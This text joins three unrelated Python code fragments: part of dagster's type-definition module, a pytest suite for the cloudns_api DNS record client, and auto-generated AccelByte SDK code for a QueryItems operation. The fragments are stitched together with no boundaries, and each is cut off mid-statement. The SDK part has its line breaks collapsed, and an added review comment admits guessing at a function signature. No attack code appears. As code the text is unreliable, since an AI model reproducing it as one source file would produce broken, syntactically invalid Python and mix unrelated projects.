        :py:class:`OutputMaterializationConfig <dagster.OutputMaterializationConfig>` that can
        persist values of this type. As a rule, you should use the
        :py:func:`@output_materialization_config <dagster.output_materialization_config>`
        decorator to construct these arguments. Default: None
    serialization_strategy (Optional[SerializationStrategy]): An instance of a class that
        inherits from :py:class:`SerializationStrategy <dagster.SerializationStrategy>`. The
        default strategy for serializing this value when automatically persisting it between
        execution steps. You should set this value if the ordinary serialization machinery
        (e.g., pickle) will not be adequate for this type. Default: None.
    auto_plugins (Optional[List[TypeStoragePlugin]]): If types must be serialized differently
        depending on the storage being used for intermediates, they should specify this
        argument. In these cases the serialization_strategy argument is not sufficient because
        serialization requires specialized API calls, e.g. to call an s3 API directly instead
        of using a generic file object. See dagster_pyspark.DataFrame for an example using
        auto_plugins. Default: None.
    typecheck_metadata_fn (Optional[Callable[[Any], TypeCheck]]): If specified, this function
        will be called to emit metadata when you successfully check a type. The
        typecheck_metadata_fn will be passed the value being type-checked and should return an
        instance of :py:class:`TypeCheck <dagster.TypeCheck>`. See dagster_pandas.DataFrame for
        an example. Default: None.
    type_check (Optional[Callable[[Any], Any]]): If specified, this function will be called in
        place of the default isinstance type check. This function should raise Failure if the
        type check fails, and otherwise pass. Its return value will be ignored.'''


def define_python_dagster_type(
    python_type,
    name=None,
    description=None,
    input_hydration_config=None,
    output_materialization_config=None,
    serialization_strategy=None,
    auto_plugins=None,
    typecheck_metadata_fn=None,
    type_check=None,
):
    # NOTE(review): because of the trailing .format(...) call, the string below
    # is an expression statement, NOT this function's docstring — __doc__ is
    # None at runtime. Presumably intentional templating gone wrong; confirm.
    '''Define a dagster type corresponding to an existing python type.

    It's very common to want to generate a dagster type corresponding to an
    existing Python type. Typically this is done using the @dagster_type
    decorator or using as_dagster_type, each of which defer to this function
    as a workhorse.

    Usage:

        DateTime = define_python_dagster_type(datetime.datetime, name='DateTime')

    {args_docstring}
    '''.format(
        args_docstring=PYTHON_DAGSTER_TYPE_ARGS_DOCSTRING
    )
    # Pure validation: return values are discarded on purpose.
    check.type_param(python_type, 'python_type')
    check.opt_str_param(name, 'name', python_type.__name__)
    check.opt_str_param(description, 'description')
    check.opt_inst_param(input_hydration_config, 'input_hydration_config', InputHydrationConfig)
    check.opt_inst_param(
        output_materialization_config, 'output_materialization_config', OutputMaterializationConfig
    )
    check.opt_inst_param(
        serialization_strategy,
        'serialization_strategy',
        SerializationStrategy,
        default=PickleSerializationStrategy(),
    )
    auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type)
    check.param_invariant(
        all(issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins),
        'auto_plugins',
    )
    check.opt_callable_param(typecheck_metadata_fn, 'typecheck_metadata_fn')
    check.opt_callable_param(type_check, 'type_check')

    # Returns a singleton-compatible subclass; callers use _ObjectType.inst().
    class _ObjectType(PythonObjectType):
        def __init__(self):
            super(_ObjectType, self).__init__(
                python_type=python_type,
                name=name,
                description=description,
                input_hydration_config=input_hydration_config,
                output_materialization_config=output_materialization_config,
                serialization_strategy=serialization_strategy,
                auto_plugins=auto_plugins,
                typecheck_metadata_fn=typecheck_metadata_fn,
                type_check=type_check,
            )

    return _ObjectType


def _create_nullable_input_schema(inner_type):
    # No hydration config on the inner type means none on the Optional either.
    if not inner_type.input_hydration_config:
        return None

    nullable_type = ConfigNullable(inner_type.input_hydration_config.schema_type).inst()

    class _NullableSchema(InputHydrationConfig):
        @property
        def schema_type(self):
            return nullable_type

        def construct_from_config_value(self, context, config_value):
            # None short-circuits; otherwise delegate to the inner schema.
            if config_value is None:
                return None
            return inner_type.input_hydration_config.construct_from_config_value(
                context, config_value
            )

    return _NullableSchema()


class NullableType(RuntimeType):
    def __init__(self, inner_type):
        key = 'Optional.' + inner_type.key
        super(NullableType, self).__init__(
            key=key, name=None, input_hydration_config=_create_nullable_input_schema(inner_type)
        )
        self.inner_type = inner_type

    @property
    def display_name(self):
        return self.inner_type.display_name + '?'

    def type_check(self, value):
        # None always passes; anything else must satisfy the inner type.
        return None if value is None else self.inner_type.type_check(value)

    @property
    def is_nullable(self):
        return True

    @property
    def inner_types(self):
        return [self.inner_type] + self.inner_type.inner_types


def _create_list_input_schema(inner_type):
    if not inner_type.input_hydration_config:
        return None

    list_type = ConfigList(inner_type.input_hydration_config.schema_type).inst()

    class _ListSchema(InputHydrationConfig):
        @property
        def schema_type(self):
            return list_type

        def construct_from_config_value(self, context, config_value):
            # Hydrate each element with the inner type's schema.
            convert_item = partial(
                inner_type.input_hydration_config.construct_from_config_value, context
            )
            return list(map(convert_item, config_value))

    return _ListSchema()


class ListType(RuntimeType):
    def __init__(self, inner_type):
        key = 'List.' + inner_type.key
        super(ListType, self).__init__(
            key=key, name=None, input_hydration_config=_create_list_input_schema(inner_type)
        )
        self.inner_type = inner_type

    @property
    def display_name(self):
        return '[' + self.inner_type.display_name + ']'

    def type_check(self, value):
        from dagster.core.definitions.events import Failure

        # Strictly a list — tuples and other sequences are rejected.
        if not isinstance(value, list):
            raise Failure('Value must be a list, got {value}'.format(value=value))

        for item in value:
            self.inner_type.type_check(item)

    @property
    def is_list(self):
        return True

    @property
    def inner_types(self):
        return [self.inner_type] + self.inner_type.inner_types


def Optional(inner_type):
    # Factory returning the memoized NullableType singleton for inner_type.
    check.inst_param(inner_type, 'inner_type', RuntimeType)

    class _Nullable(NullableType):
        def __init__(self):
            super(_Nullable, self).__init__(inner_type)

    return _Nullable.inst()


def List(inner_type):
    # Factory returning the memoized ListType singleton for inner_type.
    check.inst_param(inner_type, 'inner_type', RuntimeType)

    class _List(ListType):
        def __init__(self):
            super(_List, self).__init__(inner_type)

    return _List.inst()


class Stringish(RuntimeType):
    # Base for user types that are strings at runtime (e.g. path-like names).
    def __init__(self, key=None, name=None, **kwargs):
        name = check.opt_str_param(name, 'name', type(self).__name__)
        key = check.opt_str_param(key, 'key', name)
        super(Stringish, self).__init__(
            key=key,
            name=name,
            input_hydration_config=BuiltinSchemas.STRING_INPUT,
            output_materialization_config=BuiltinSchemas.STRING_OUTPUT,
            **kwargs
        )

    @property
    def is_scalar(self):
        return True

    def type_check(self, value):
        return _throw_if_not_string(value)


# Singleton lookup used by RuntimeType.from_builtin_enum.
_RUNTIME_MAP = {
    BuiltinEnum.ANY: Any.inst(),
    BuiltinEnum.BOOL: Bool.inst(),
    BuiltinEnum.FLOAT: Float.inst(),
    BuiltinEnum.INT: Int.inst(),
    BuiltinEnum.PATH: Path.inst(),
    BuiltinEnum.STRING: String.inst(),
    BuiltinEnum.NOTHING: Nothing.inst(),
}


def resolve_to_runtime_type(dagster_type):
    # circular dep
    from .mapping import remap_python_type
    from .python_dict import PythonDict, create_typed_runtime_dict
    from .python_set import PythonSet, create_typed_runtime_set
    from .python_tuple import PythonTuple, create_typed_tuple

    dagster_type = remap_python_type(dagster_type)
    # do not do in remap because this is runtime system only.
    # NOTE(review): source is truncated below this point in this chunk.
    if is_closed_python_dict_type(dagster_type):
        return create_typed_runtime_dict(dagster_type.__args__[0],
# -*- coding: utf-8 -*- # # name: test_record.py # author: <NAME> | Prestix Studio, LLC. # email: <EMAIL> # created on: 05/25/2019 # """ Functional tests for cloudns_api's record module. """ from pytest import raises from cloudns_api import record from cloudns_api.validation import ValidationError from .helpers import mock_get_request, mock_post_request ## # Record Tests @mock_get_request() def test_record_get_available_record_types_function(): """Record get_available_record_types function sends properly formated request.""" response = record.get_available_record_types('domain') assert response.success payload = response.payload assert payload['url'] == \ 'https://api.cloudns.net/dns/get-available-record-types.json' assert payload['params']['zone-type'] == 'domain' @mock_get_request() def test_record_get_available_record_types_catches_validation_errors(): """Record get_available_record_types function catches invalid record type.""" response = record.get_available_record_types('not-valid') assert not response.success assert response.json()['error'] == 'Validation error.' 
@mock_get_request()
def test_record_get_available_ttls_function():
    """Record get_available_ttls function sends properly formatted request."""
    # BUG FIX: this test previously duplicated test_record_list_function
    # verbatim (calling record.list and asserting the records.json endpoint),
    # so record.get_available_ttls was never exercised at all.
    # NOTE(review): confirm the exact get_available_ttls signature against
    # cloudns_api/record.py — the ClouDNS "available TTL" endpoint is
    # dns/get-available-ttl.json.
    response = record.get_available_ttls('example.com')

    assert response.success

    payload = response.payload
    assert payload['url'] == 'https://api.cloudns.net/dns/get-available-ttl.json'
    assert payload['params']['domain-name'] == 'example.com'


@mock_get_request()
def test_record_list_function():
    """Record list function sends properly formatted request."""
    response = record.list('example.com', host='ns1')

    assert response.success

    payload = response.payload
    assert payload['url'] == 'https://api.cloudns.net/dns/records.json'
    assert payload['params']['domain-name'] == 'example.com'
    assert payload['params']['host'] == 'ns1'


##
# generate_record_parameters: one "works" / "catches errors" pair per type.

def test_generate_record_parameters_works_for_a_records():
    """The generate_record_parameters function generates A record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='', record_type='A',
        record='10.10.10.10', ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'A'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == ''
    assert payload['record'] == '10.10.10.10'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_catches_a_record_errors():
    """The generate_record_parameters function catches A record errors."""
    with raises(ValidationError):
        record.generate_record_parameters(
            domain_name='example.com', host='', record_type='A', ttl=3600,
            record='not an ip address')


def test_generate_record_parameters_works_for_aaaa_records():
    """The generate_record_parameters function generates AAAA record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='', record_type='AAAA',
        record='fc00:db20:35b:7399::5', ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'AAAA'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == ''
    assert payload['record'] == 'fc00:db20:35b:7399::5'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_catches_aaaa_record_errors():
    """The generate_record_parameters function catches AAAA record errors."""
    with raises(ValidationError):
        record.generate_record_parameters(
            domain_name='example.com', host='', record_type='AAAA', ttl=3600,
            record='not an ip address')


def test_generate_record_parameters_works_for_mx_records():
    """The generate_record_parameters function generates MX record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='mx1', record_type='MX',
        record='mail.example.com', ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'MX'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == 'mx1'
    assert payload['record'] == 'mail.example.com'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_catches_mx_record_errors():
    """The generate_record_parameters function catches MX record errors."""
    with raises(ValidationError):
        record.generate_record_parameters(
            domain_name='example.com', host='mx1', record_type='MX', ttl=3600,
            record='not an hostname')


def test_generate_record_parameters_works_for_cname_records():
    """The generate_record_parameters function generates CNAME record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='www', record_type='CNAME',
        record='example.com', ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'CNAME'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == 'www'
    assert payload['record'] == 'example.com'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_catches_cname_record_errors():
    """The generate_record_parameters function catches CNAME record errors."""
    with raises(ValidationError):
        record.generate_record_parameters(
            domain_name='example.com', host='www', record_type='CNAME',
            ttl=3600, record='not an hostname')


def test_generate_record_parameters_works_for_txt_records():
    """The generate_record_parameters function generates TXT record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='', record_type='TXT',
        record='Anything goes...', ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'TXT'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == ''
    assert payload['record'] == 'Anything goes...'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_works_for_spf_records():
    """The generate_record_parameters function generates SPF record
    parameters."""
    # SPF records accept free-form text, so no "catches errors" counterpart.
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='', record_type='SPF',
        record='Anything goes...', ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'SPF'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == ''
    assert payload['record'] == 'Anything goes...'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_works_for_ns_records():
    """The generate_record_parameters function generates NS record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='www', record_type='NS',
        record='example.com', ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'NS'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == 'www'
    assert payload['record'] == 'example.com'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_catches_ns_record_errors():
    """The generate_record_parameters function catches NS record errors."""
    with raises(ValidationError):
        record.generate_record_parameters(
            domain_name='example.com', host='www', record_type='NS', ttl=3600,
            record='not an hostname')


def test_generate_record_parameters_works_for_srv_records():
    """The generate_record_parameters function generates SRV record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='srv1', record_type='SRV',
        record='srv.example.org', priority=10, weight=10, ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'SRV'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == 'srv1'
    assert payload['record'] == 'srv.example.org'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_catches_srv_record_errors():
    """The generate_record_parameters function catches SRV record errors."""
    with raises(ValidationError):
        record.generate_record_parameters(
            domain_name='example.com', host='srv', record_type='SRV',
            priority=10, weight=10, ttl=3600, record='not an hostname')


def test_generate_record_parameters_works_for_wr_records():
    """The generate_record_parameters function generates WR record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='', record_type='WR',
        redirect_type=301, record='https://example.org/path/', ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'WR'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == ''
    assert payload['record'] == 'https://example.org/path/'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_works_for_alias_records():
    """The generate_record_parameters function generates ALIAS record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='www', record_type='ALIAS',
        record='www.example.org', ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'ALIAS'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == 'www'
    assert payload['record'] == 'www.example.org'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_catches_alias_record_errors():
    """The generate_record_parameters function catches ALIAS record errors."""
    with raises(ValidationError):
        record.generate_record_parameters(
            domain_name='example.com', host='www', record_type='ALIAS',
            ttl=3600, record='not an hostname')


def test_generate_record_parameters_works_for_rp_records():
    """The generate_record_parameters function generates RP record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='', record_type='RP',
        record='<EMAIL>', ttl=3600)

    payload = parameters.to_dict()

    assert payload['record-type'] == 'RP'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == ''
    assert payload['record'] == '<EMAIL>'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_works_for_sshfp_records():
    """The generate_record_parameters function generates SSHFP record
    parameters."""
    parameters = record.generate_record_parameters(
        domain_name='example.com', host='www', record_type='SSHFP',
        record='the fingerprint...', ttl=3600, algorithm='RSA',
        fptype='SHA-256')

    payload = parameters.to_dict()

    assert payload['record-type'] == 'SSHFP'
    assert payload['domain-name'] == 'example.com'
    assert payload['host'] == 'www'
    assert payload['record'] == 'the fingerprint...'
    assert payload['ttl'] == 3600


def test_generate_record_parameters_catches_sshfp_record_errors():
    """The generate_record_parameters function catches SSHFP record errors."""
    with raises(ValidationError):
        record.generate_record_parameters(
            domain_name='example.com', host='www', record_type='SSHFP',
            record='the fingerprint...', ttl=3600,
            algorithm='not an algorithm', fptype='SHA-356')


def test_generate_record_parameters_checks_for_invalid_type():
    """The generate_record_parameters function catches invalid record
    types."""
    # Docstring fixed: it previously claimed "catches NS record errors"
    # (copy-paste), but this test covers an unknown record_type.
    with raises(ValidationError):
        record.generate_record_parameters(
            domain_name='example.com', record_type='bad-type')


@mock_post_request()
def test_record_create_function():
    """Record create function sends properly formatted update request."""
    response = record.create('example.com', host='', record_type='A',
                             record='10.10.10.10', ttl=3600)

    assert response.success

    payload = response.payload
    assert payload['url'] == 'https://api.cloudns.net/dns/add-record.json'
    assert payload['params']['record-type'] == 'A'
    assert payload['params']['domain-name'] == 'example.com'
    assert payload['params']['host'] == ''
    assert payload['params']['record'] == '10.10.10.10'
    assert payload['params']['ttl'] == 3600


@mock_post_request()
def test_record_create_function_catches_validation_errors():
    """Record create function catches validation errors."""
    response = record.create('not a valid domain', host='', record_type='A',
                             record='10.10.10.10', ttl=3600)

    assert not response.success
    assert response.json()['error'] == 'Validation error.'
@mock_post_request() def test_record_transfer_function(): """Record transfer function sends properly formated get request.""" response = record.transfer('example.com', server='1.1.1.1') assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/axfr-import.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['server'] == '1.1.1.1' @mock_get_request() def test_record_copy_function(): """Record copy function sends properly formated get request.""" response = record.copy('example.com', from_domain='example.net', delete_current_records=True) assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/copy-records.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['from-domain'] == 'example.net' assert payload['params']['delete-current-records'] == 1 @mock_get_request(payload={ 1234: { 'type': 'A', 'domain-name': 'example.com', 'record-id': 1234, 'host': 'ns1', 'ttl': 3600, 'record': '10.0.0.10', } }) def test_record_get_function(): """Record get function sends properly formated get request.""" response = record.get('example.com', 1234) assert response.success payload = response.payload assert payload['type'] == 'A' assert payload['domain-name'] == 'example.com' assert payload['record-id'] == 1234 assert payload['host'] == 'ns1' assert payload['ttl'] == 3600 assert payload['record'] == '10.0.0.10' @mock_get_request(payload={ 1234: { 'type': 'A', 'domain-name': 'example.com', 'record-id': 1234, 'host': 'ns1', 'ttl': 3600, 'record': '10.0.0.10', } }) def test_record_get_function_with_bad_record_id(): """Record get function sends properly formated error message when record_id does not exist.""" response = record.get('example.com', 5678) assert not response.success assert response.error == \ 'Record "5678" not found in "example.com" zone.' 
assert str(response.status_code) == '404' @mock_get_request() def test_record_export_function(): """Record export function sends properly formated get request.""" response = record.export('example.com') assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/records-export.json' assert payload['params']['domain-name'] == 'example.com' @mock_get_request() def test_record_get_dynamic_url_function(): """Record get_dynamic_url function sends properly formated get request.""" response = record.get_dynamic_url('example.com', record_id=1234) assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/get-dynamic-url.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['record-id'] == 1234 @mock_post_request() def test_record_update_function(): """Record update function sends properly formated update request.""" response = record.update('example.com', record_id=1234, record_type='A', host='ns1', ttl=3600, record='10.0.0.10') assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/mod-record.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['record-id'] == 1234 assert payload['params']['host'] == 'ns1' assert payload['params']['ttl'] == 3600 assert payload['params']['record'] == '10.0.0.10' @mock_get_request(payload={ 1234: { 'type': 'A', 'domain-name': 'example.com', 'record-id': 1234, 'host': 'ns1', 'ttl': 3600, 'record': '10.0.0.10', } }) @mock_post_request() def test_record_update_function_can_figure_out_record_type(): """Record update function can figure out what record type a record is.""" response = record.update('example.com', record_id=1234, host='ns1', ttl=3600, record='10.0.0.10') assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/mod-record.json' assert payload['params']['domain-name'] == 
'example.com' assert payload['params']['record-id'] == 1234 assert payload['params']['host'] == 'ns1' assert payload['params']['ttl'] == 3600 assert payload['params']['record'] == '10.0.0.10' @mock_get_request(payload={ 1234: { 'type': 'A', 'domain-name': 'example.com', 'record-id': 1234, 'host': 'ns1', 'ttl': 3600, 'record': '10.0.0.10', } }) def test_record_update_function_with_bad_record_id(): """Record update function sends properly formated error message when record_id does not exist.""" response = record.update('example.com', record_id=5678, host='ns1', ttl=3600, record='10.0.0.10') assert not response.success assert response.error == \ 'Record "5678" not found in "example.com" zone.' assert str(response.status_code) == '404' @mock_get_request(payload={ 1234: { 'type': 'A', 'domain-name': 'example.com', 'record-id': 1234, 'host': 'ns1', 'ttl': 3600, 'record': '10.0.0.10', } }) @mock_post_request() def test_record_update_function_using_patch(): """Record update function sends properly formated update request when doing a patch update.""" response = record.update('example.com', record_id=1234, record='10.10.10.10', patch=True)
# NOTE(review): the chunk below is auto-generated AccelByte SDK code
# ("Code generated. DO NOT EDIT!") defining the QueryItems operation.  Its
# newlines were stripped by an extraction step, so each physical line below is
# a whole file segment collapsed onto one line; the class is truncated inside
# its create() classmethod at the end of the chunk.  Content is preserved
# byte-for-byte -- regenerate from the SDK codegen template rather than
# hand-editing.
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved. # This is licensed software from AccelByte Inc, for limitations # and restrictions contact your company contract manager. # # Code generated. DO NOT EDIT! # template file: justice_py_sdk_codegen/__main__.py # pylint: disable=duplicate-code # pylint: disable=line-too-long # pylint: disable=missing-function-docstring # pylint: disable=missing-module-docstring # pylint: disable=too-many-arguments # pylint: disable=too-many-branches # pylint: disable=too-many-instance-attributes # pylint: disable=too-many-lines # pylint: disable=too-many-locals # pylint: disable=too-many-public-methods # pylint: disable=too-many-return-statements # pylint: disable=too-many-statements # pylint: disable=unused-import # justice-platform-service (4.10.0) from __future__ import annotations from typing import Any, Dict, List, Optional, Tuple, Union from .....core import Operation from .....core import HeaderStr from .....core import HttpResponse from .....core import StrEnum from ...models import ErrorEntity from ...models import FullItemPagingSlicedResult from ...models import ValidationErrorEntity class AppTypeEnum(StrEnum): DEMO = "DEMO" DLC = "DLC" GAME = "GAME" SOFTWARE = "SOFTWARE" class ItemTypeEnum(StrEnum): APP = "APP" BUNDLE = "BUNDLE" CODE = "CODE" COINS = "COINS" INGAMEITEM = "INGAMEITEM" MEDIA = "MEDIA" SEASON = "SEASON" SUBSCRIPTION = "SUBSCRIPTION" class SortByEnum(StrEnum): NAME = "name" NAME_ASC = "name:asc" NAME_DESC = "name:desc" CREATEDAT = "createdAt" CREATEDAT_ASC = "createdAt:asc" CREATEDAT_DESC = "createdAt:desc" UPDATEDAT = "updatedAt" UPDATEDAT_ASC = "updatedAt:asc" UPDATEDAT_DESC = "updatedAt:desc" DISPLAYORDER = "displayOrder" DISPLAYORDER_ASC = "displayOrder:asc" DISPLAYORDER_DESC = "displayOrder:desc" class QueryItems(Operation): """Query items by criteria (queryItems) This API is used to query items by criteria within a store. 
Other detail info: * Required permission : resource="ADMIN:NAMESPACE:{namespace}:ITEM", action=2 (READ) * Returns : the list of items Required Permission(s): - ADMIN:NAMESPACE:{namespace}:ITEM [READ] Properties: url: /platform/admin/namespaces/{namespace}/items/byCriteria method: GET tags: ["Item"] consumes: [] produces: ["application/json"] securities: [BEARER_AUTH] or [BEARER_AUTH] namespace: (namespace) REQUIRED str in path active_only: (activeOnly) OPTIONAL bool in query app_type: (appType) OPTIONAL Union[str, AppTypeEnum] in query available_date: (availableDate) OPTIONAL str in query base_app_id: (baseAppId) OPTIONAL str in query category_path: (categoryPath) OPTIONAL str in query features: (features) OPTIONAL str in query item_type: (itemType) OPTIONAL Union[str, ItemTypeEnum] in query limit: (limit) OPTIONAL int in query offset: (offset) OPTIONAL int in query region: (region) OPTIONAL str in query sort_by: (sortBy) OPTIONAL List[Union[str, SortByEnum]] in query store_id: (storeId) OPTIONAL str in query tags: (tags) OPTIONAL str in query target_namespace: (targetNamespace) OPTIONAL str in query Responses: 200: OK - FullItemPagingSlicedResult (successful operation) 404: Not Found - ErrorEntity (30141: Store [{storeId}] does not exist in namespace [{namespace}] | 30142: Published store does not exist in namespace [{namespace}]) 422: Unprocessable Entity - ValidationErrorEntity (20002: validation error) """ # region fields _url: str = "/platform/admin/namespaces/{namespace}/items/byCriteria" _method: str = "GET" _consumes: List[str] = [] _produces: List[str] = ["application/json"] _securities: List[List[str]] = [["BEARER_AUTH"], ["BEARER_AUTH"]] _location_query: str = None namespace: str # REQUIRED in [path] active_only: bool # OPTIONAL in [query] app_type: Union[str, AppTypeEnum] # OPTIONAL in [query] available_date: str # OPTIONAL in [query] base_app_id: str # OPTIONAL in [query] category_path: str # OPTIONAL in [query] features: str # OPTIONAL in [query] 
item_type: Union[str, ItemTypeEnum] # OPTIONAL in [query] limit: int # OPTIONAL in [query] offset: int # OPTIONAL in [query] region: str # OPTIONAL in [query] sort_by: List[Union[str, SortByEnum]] # OPTIONAL in [query] store_id: str # OPTIONAL in [query] tags: str # OPTIONAL in [query] target_namespace: str # OPTIONAL in [query] # endregion fields # region properties @property def url(self) -> str: return self._url @property def method(self) -> str: return self._method @property def consumes(self) -> List[str]: return self._consumes @property def produces(self) -> List[str]: return self._produces @property def securities(self) -> List[List[str]]: return self._securities @property def location_query(self) -> str: return self._location_query # endregion properties # region get methods # endregion get methods # region get_x_params methods def get_all_params(self) -> dict: return { "path": self.get_path_params(), "query": self.get_query_params(), } def get_path_params(self) -> dict: result = {} if hasattr(self, "namespace"): result["namespace"] = self.namespace return result def get_query_params(self) -> dict: result = {} if hasattr(self, "active_only"): result["activeOnly"] = self.active_only if hasattr(self, "app_type"): result["appType"] = self.app_type if hasattr(self, "available_date"): result["availableDate"] = self.available_date if hasattr(self, "base_app_id"): result["baseAppId"] = self.base_app_id if hasattr(self, "category_path"): result["categoryPath"] = self.category_path if hasattr(self, "features"): result["features"] = self.features if hasattr(self, "item_type"): result["itemType"] = self.item_type if hasattr(self, "limit"): result["limit"] = self.limit if hasattr(self, "offset"): result["offset"] = self.offset if hasattr(self, "region"): result["region"] = self.region if hasattr(self, "sort_by"): result["sortBy"] = self.sort_by if hasattr(self, "store_id"): result["storeId"] = self.store_id if hasattr(self, "tags"): result["tags"] = self.tags if 
hasattr(self, "target_namespace"): result["targetNamespace"] = self.target_namespace return result # endregion get_x_params methods # region is/has methods # endregion is/has methods # region with_x methods def with_namespace(self, value: str) -> QueryItems: self.namespace = value return self def with_active_only(self, value: bool) -> QueryItems: self.active_only = value return self def with_app_type(self, value: Union[str, AppTypeEnum]) -> QueryItems: self.app_type = value return self def with_available_date(self, value: str) -> QueryItems: self.available_date = value return self def with_base_app_id(self, value: str) -> QueryItems: self.base_app_id = value return self def with_category_path(self, value: str) -> QueryItems: self.category_path = value return self def with_features(self, value: str) -> QueryItems: self.features = value return self def with_item_type(self, value: Union[str, ItemTypeEnum]) -> QueryItems: self.item_type = value return self def with_limit(self, value: int) -> QueryItems: self.limit = value return self def with_offset(self, value: int) -> QueryItems: self.offset = value return self def with_region(self, value: str) -> QueryItems: self.region = value return self def with_sort_by(self, value: List[Union[str, SortByEnum]]) -> QueryItems: self.sort_by = value return self def with_store_id(self, value: str) -> QueryItems: self.store_id = value return self def with_tags(self, value: str) -> QueryItems: self.tags = value return self def with_target_namespace(self, value: str) -> QueryItems: self.target_namespace = value return self # endregion with_x methods # region to methods def to_dict(self, include_empty: bool = False) -> dict: result: dict = {} if hasattr(self, "namespace") and self.namespace: result["namespace"] = str(self.namespace) elif include_empty: result["namespace"] = "" if hasattr(self, "active_only") and self.active_only: result["activeOnly"] = bool(self.active_only) elif include_empty: result["activeOnly"] = False if 
hasattr(self, "app_type") and self.app_type: result["appType"] = str(self.app_type) elif include_empty: result["appType"] = Union[str, AppTypeEnum]() if hasattr(self, "available_date") and self.available_date: result["availableDate"] = str(self.available_date) elif include_empty: result["availableDate"] = "" if hasattr(self, "base_app_id") and self.base_app_id: result["baseAppId"] = str(self.base_app_id) elif include_empty: result["baseAppId"] = "" if hasattr(self, "category_path") and self.category_path: result["categoryPath"] = str(self.category_path) elif include_empty: result["categoryPath"] = "" if hasattr(self, "features") and self.features: result["features"] = str(self.features) elif include_empty: result["features"] = "" if hasattr(self, "item_type") and self.item_type: result["itemType"] = str(self.item_type) elif include_empty: result["itemType"] = Union[str, ItemTypeEnum]() if hasattr(self, "limit") and self.limit: result["limit"] = int(self.limit) elif include_empty: result["limit"] = 0 if hasattr(self, "offset") and self.offset: result["offset"] = int(self.offset) elif include_empty: result["offset"] = 0 if hasattr(self, "region") and self.region: result["region"] = str(self.region) elif include_empty: result["region"] = "" if hasattr(self, "sort_by") and self.sort_by: result["sortBy"] = [str(i0) for i0 in self.sort_by] elif include_empty: result["sortBy"] = [] if hasattr(self, "store_id") and self.store_id: result["storeId"] = str(self.store_id) elif include_empty: result["storeId"] = "" if hasattr(self, "tags") and self.tags: result["tags"] = str(self.tags) elif include_empty: result["tags"] = "" if hasattr(self, "target_namespace") and self.target_namespace: result["targetNamespace"] = str(self.target_namespace) elif include_empty: result["targetNamespace"] = "" return result # endregion to methods # region response methods # noinspection PyMethodMayBeStatic def parse_response(self, code: int, content_type: str, content: Any) -> Tuple[Union[None, 
FullItemPagingSlicedResult], Union[None, ErrorEntity, HttpResponse, ValidationErrorEntity]]: """Parse the given response. 200: OK - FullItemPagingSlicedResult (successful operation) 404: Not Found - ErrorEntity (30141: Store [{storeId}] does not exist in namespace [{namespace}] | 30142: Published store does not exist in namespace [{namespace}]) 422: Unprocessable Entity - ValidationErrorEntity (20002: validation error) ---: HttpResponse (Undocumented Response) ---: HttpResponse (Unexpected Content-Type Error) ---: HttpResponse (Unhandled Error) """ pre_processed_response, error = self.pre_process_response(code=code, content_type=content_type, content=content) if error is not None: return None, None if error.is_no_content() else error code, content_type, content = pre_processed_response if code == 200: return FullItemPagingSlicedResult.create_from_dict(content), None if code == 404: return None, ErrorEntity.create_from_dict(content) if code == 422: return None, ValidationErrorEntity.create_from_dict(content) return None, self.handle_undocumented_response(code=code, content_type=content_type, content=content) # endregion response methods # region static methods @classmethod def create( cls, namespace: str, active_only: Optional[bool] = 